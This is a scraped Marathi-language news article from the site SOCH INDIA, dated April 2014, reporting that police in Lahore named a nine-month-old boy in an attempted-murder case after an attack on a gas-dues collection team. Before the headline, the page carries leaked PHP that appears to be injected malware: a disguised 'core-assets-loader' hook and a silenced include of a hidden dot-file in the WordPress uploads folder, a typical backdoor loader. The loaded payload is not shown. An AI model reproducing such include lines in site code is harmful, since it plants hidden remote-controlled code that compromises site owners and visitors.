add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ९ महिन्याच्या बाळावर हत्येचा प्रयत्न केल्याचा गुन्हा – SOCH INDIA
Menu

अपराध समाचार
९ महिन्याच्या बाळावर हत्येचा प्रयत्न केल्याचा गुन्हा

nobanner

शुक्रवार ४ एप्रिल २०१४ एक नजर (04-04-2014 : 09:57:16) ऑनलाइन टीम लाहोर, दि. ४ – पाकिस्तानमधील पोलिसांच्या भोंगळ कारभाराचा एक धक्कादायक प्रकार समोर आला असून नऊ महिन्याच्या लहान मुलावर पोलिसांनी चक्क हत्येचा प्रयत्न केल्याचा गुन्हा दाखल केला आहे. विशेष म्हणजे हा गुन्हा पोलिसांवर हल्ला केल्याप्रकरणीच दाखल करण्यात आला असून स्थानिक कोर्टाने या चिमूरड्याला जामीन दिला आहे. लाहोरमधील मुस्लिम टाऊन या भागातील गॅस ग्राहकांनी एजन्सीचे पैसे थकवले होते. ही थकबाकी वसूल करण्यासाठी पोलिस संरक्षणाखाली गॅस एजन्सीचे कर्मचारी वसूली करत होती. या कारवाईविरोधात स्थानिकांनी हिंसक आंदोलन करत पथकाला पळवून लावले होते. यात पोलिसांनाही मारहाण करण्यात आली होती. पोलिसांवर हल्ला केल्याप्रकरणी एका पोलिस कर्मचा-याने तक्रार नोंदवली होती. यात मोहम्मद यासीन, त्यांचा मुलगा इरफान आणि इम्रान यांच्यासह आरोपी म्हणून इम्रानच्या ९ महिन्याचा मुलगा मुसाचाही एफआयआरमध्ये समावेश करण्यात आला. तक्रारदार पोलिसाला यासीन यांचा नातू मुसा हा नऊ महिन्याचा मुलगा याची माहितीच नव्हती. त्यांनी कोणतीही खातरजमा न करता मुसालाही आरोपी बनवून टाकले.